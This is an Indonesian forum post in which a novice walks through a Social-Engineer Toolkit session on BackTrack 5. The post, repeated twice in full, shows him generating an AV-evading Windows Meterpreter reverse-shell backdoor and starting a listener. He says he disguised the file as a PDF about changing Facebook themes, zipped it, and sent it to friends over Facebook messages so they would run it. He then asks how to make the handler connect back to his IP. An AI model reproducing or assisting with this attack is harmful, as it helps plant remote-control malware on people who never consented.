gini mas brow, waktu saia baca-baca artikel tentang tool SET, saia kepikiran untuk mencobanya, tapi.... karena baterai laptop saia lagi drop, jadi saia tidak praktek di jaringan Wifi, tapi saia paraktek dengan mengunakan dial up.
skenarionya begini mas brow
:: backdoor adalah suatu infeksi yang kita tanamkan kedalam komputer korban sehingga kita bisa meremote (rooting) komputer korban ::
nah iseng-iseng saia buka tu konsole di backtrack 5 saia, dan saia ketik
root@bt:/pentest/exploits/set# ./set
-------------------------------------------------------------
Select from the menu:
1) Social-Engineering Attacks ------------> saia pilih ini
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
-------------------------------------------------------------
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener ------------> saia pilih ini
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
99) Return back to the main menu.
set> 4
-------------------------------------------------------------
[!] ERROR:UPX packer not found in the pathname specified in config. Disabling UPX packing for executable! ============>> nah ini kenapa ya mas ???
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker ---------> saia pilih ini
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell New custom interactive reverse shell designed for SET
12) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
13) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
14) Import your own executable Specify a path for your own executable
set:payloads> 2
----------------------------------------------------------------------
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
2) shikata_ga_nai (Very Good)
3) alpha_mixed (Normal)
4) alpha_upper (Normal)
5) call4_dword_xor (Normal)
6) countdown (Normal)
7) fnstenv_mov (Normal)
8) jmp_call_additive (Normal)
9) nonalpha (Normal)
10) nonupper (Normal)
11) unicode_mixed (Normal)
12) unicode_upper (Normal)
13) alpha2 (Normal)
14) No Encoding (None)
15) Multi-Encoder (Excellent)
16) Backdoored Executable (BEST) -----> saia pilih ini
set:encoding> 16
------------------------------------------------------------------
set:payloads> PORT of the listener [443]: ---> dan saia isikan 5555
------------------------------------------------------------------
dan proses pembuatan Backdoor sedang berlangsung, file backdoor akan terletak di directory /pentest/exploits/set dengan nama msf.exe, nah untuk menarik keingin tahuan si korban, saya rename menjadi (cara merubah thema FB.pdf.exe) dan saia rubah menjadi .zip ( karena fasilitas messages di FB tidak memperbolehkan mengirim file ber_extensi .exe ) hehehehe.......
file backdoor tersebut saia kirimkan kepada teman-teman saia melalui fasilitas messages FB, dengan harapan mereka meng excute file yang saia kirimkan (sosial enginering) rasa ingin tahu manusia
nah kembali ke konsole saia
set> Start the listener now? [yes|no]: -----> saia pilih y
==================================================
[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 5555
LPORT => 5555
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:5555 --->> gimana agar hendler IP kita ?
[*] Starting the payload handler...
============================================================
ini dia masalahnya mas-mas..... setahu saia kita harus men set hendler agar sent back kepada IP kita, jika dilihat diatas handler nya 0.0.0.0 dengan port 5555
bisa g ya skenario yang ada di kepala saia ini terwujud, mohon temen-temen dapat membantu ....
maaf panjang dan rumit, pengguna baru yang ingin tau mas.... hehehehe .... :badpc:
skenarionya begini mas brow
:: backdoor adalah suatu infeksi yang kita tanamkan kedalam komputer korban sehingga kita bisa meremote (rooting) komputer korban ::
nah iseng-iseng saia buka tu konsole di backtrack 5 saia, dan saia ketik
root@bt:/pentest/exploits/set# ./set
-------------------------------------------------------------
Select from the menu:
1) Social-Engineering Attacks ------------> saia pilih ini
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
-------------------------------------------------------------
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener ------------> saia pilih ini
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
99) Return back to the main menu.
set> 4
-------------------------------------------------------------
[!] ERROR:UPX packer not found in the pathname specified in config. Disabling UPX packing for executable! ============>> nah ini kenapa ya mas ???
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker ---------> saia pilih ini
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell New custom interactive reverse shell designed for SET
12) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
13) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
14) Import your own executable Specify a path for your own executable
set:payloads> 2
----------------------------------------------------------------------
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
2) shikata_ga_nai (Very Good)
3) alpha_mixed (Normal)
4) alpha_upper (Normal)
5) call4_dword_xor (Normal)
6) countdown (Normal)
7) fnstenv_mov (Normal)
8) jmp_call_additive (Normal)
9) nonalpha (Normal)
10) nonupper (Normal)
11) unicode_mixed (Normal)
12) unicode_upper (Normal)
13) alpha2 (Normal)
14) No Encoding (None)
15) Multi-Encoder (Excellent)
16) Backdoored Executable (BEST) -----> saia pilih ini
set:encoding> 16
------------------------------------------------------------------
set:payloads> PORT of the listener [443]: ---> dan saia isikan 5555
------------------------------------------------------------------
dan proses pembuatan Backdoor sedang berlangsung, file backdoor akan terletak di directory /pentest/exploits/set dengan nama msf.exe, nah untuk menarik keingin tahuan si korban, saya rename menjadi (cara merubah thema FB.pdf.exe) dan saia rubah menjadi .zip ( karena fasilitas messages di FB tidak memperbolehkan mengirim file ber_extensi .exe
) hehehehe.......file backdoor tersebut saia kirimkan kepada teman-teman saia melalui fasilitas messages FB, dengan harapan mereka meng excute file yang saia kirimkan (sosial enginering) rasa ingin tahu manusia
nah kembali ke konsole saia
set> Start the listener now? [yes|no]: -----> saia pilih y
==================================================
[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 5555
LPORT => 5555
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:5555 --->> gimana agar hendler IP kita ?
[*] Starting the payload handler...
============================================================
ini dia masalahnya mas-mas..... setahu saia kita harus men set hendler agar sent back kepada IP kita, jika dilihat diatas handler nya 0.0.0.0 dengan port 5555
bisa g ya skenario yang ada di kepala saia ini terwujud, mohon temen-temen dapat membantu ....
maaf panjang dan rumit, pengguna baru yang ingin tau mas.... hehehehe .... :badpc:
===================================
kekuranganku adalah tidak adanya kelebihan./
===================================
kekuranganku adalah tidak adanya kelebihan./
===================================